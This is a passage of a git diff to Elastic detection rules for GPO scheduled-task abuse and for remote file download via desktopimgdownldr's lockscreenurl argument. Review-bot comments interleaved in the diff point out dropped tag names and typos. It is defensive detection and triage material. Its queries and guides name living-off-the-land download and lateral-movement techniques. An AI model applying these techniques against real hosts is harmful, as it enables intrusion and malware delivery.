detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(event.code: \"5136\" and 
winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", 
@@ -70,7 +70,7 @@
],
"risk_score": 47,
"rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e",
- "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -83,7 +83,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0004",
"name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json
index 7dd86d4242e..092ebc4cc9e 100644
--- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to 
detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(event.code: \"5136\" and 
winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", 
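Review bot: On the new `+ "note"` line the step that tells the analyst which tags to inspect now reads "check the `` and `` XML tags", and the GPO path appears as `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` without its prefix, whereas the removed line spelled them `\u003cGPOPath\u003e`, `\u003cCommand\u003e` and `\u003cArguments\u003e`. Since `\u003c`/`\u003e` and literal `<`/`>` decode to the same JSON string, this is either only this page discarding `<GPOPath>`, `<Command>` and `<Arguments>` as HTML tags, or the exporter genuinely dropped them; please check the committed _108 file. If they are gone, restore the step to "check the `<Command>` and `<Arguments>` XML tags for any potentially malicious commands or binaries"; if they are present, keeping the `\u003c` escaping (or backtick-wrapping the names) is the safer choice because a Markdown/HTML renderer of this guide can swallow `<Command>` in exactly the same way. Nothing else in this hunk changes after parsing.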
@@ -70,7 +70,7 @@
],
"risk_score": 47,
"rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e",
- "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -84,7 +84,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0004",
"name": "Privilege Escalation",
@@ -118,7 +118,7 @@
]
},
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0008",
"name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json
index 1a2398c189e..e374af60dac 100644
--- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to 
detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "(event.code: \"5136\" and 
winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", 
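Review bot: The remediation step `- Remove the script from the GPO.` on the new `+ "note"` line refers to a script, but the behaviour this rule detects is a scheduled task written to `ScheduledTasks.xml` (the "Startup/Logon Script added to Group Policy Object" rule listed under related rules is the script case); suggest `- Remove the scheduled task from the GPO's ScheduledTasks.xml and review any remaining entries.`. The same line also shows empty backticks where the removed line had `\u003cGPOPath\u003e`, `\u003cCommand\u003e` and `\u003cArguments\u003e`; because `\u003c` and `<` decode identically this may only be the page dropping angle brackets as HTML, but it is worth confirming the committed _109 file still names the tags, since this is the version that ships. The rest of the hunk is a pure re-encoding of `\u003e` to `>` with no change after parsing.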
@@ -70,7 +70,7 @@
],
"risk_score": 47,
"rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e",
- "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n",
+ "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -84,7 +84,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0004",
"name": "Privilege Escalation",
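Review bot: The new `+ "setup"` string repeats the duplicated word in both paragraphs, `Steps to implement the logging policy with with Advanced Audit Configuration:`; the commit already rewrites this line to replace `\u003e` with `>`, so dropping the extra `with` here costs nothing, and the identical text recurs in the _107 and _108 copies of the rule earlier in the patch. The parenthetical `(Success Failure)` in the first sentence of each paragraph also lacks the separator used in the GPO path line `(Success,Failure)`; `(Success, Failure)` would read consistently. Both are text inside a JSON string, so the surrounding `\n` escapes and the fenced block must stay exactly as they are.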
@@ -118,7 +118,7 @@
]
},
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0008",
"name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json
index e952f35802e..77638897c7c 100644
--- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. 
However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, 
modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
"query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n",
"references": [
"https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/"
@@ -58,7 +58,7 @@
],
"risk_score": 47,
"rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
"tags": [
"Elastic",
@@ -71,7 +71,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0011",
"name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json
index 2c04a81373f..53be0bed154 100644
--- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json
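Review bot: The new `+ "note"` line carries the step `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.`, but this rule's query fires on a `desktopimgdownldr.exe` process start with `/lockscreenurl:http*`, not on a registry change, so the time anchor looks copied from a registry-persistence guide; suggest `... to the target host around the time of the download.`. The same line also has the duplicated `to to` in `is used to to configure lockscreen/desktop image`. Neither defect is introduced by this commit, which only re-encodes `\u003e` as `>` inside this string, but both ride into the new side unchanged. The `@@ -58` and `@@ -71` hunks sharing this line are pure re-encodings with no change after parsing.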
+++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
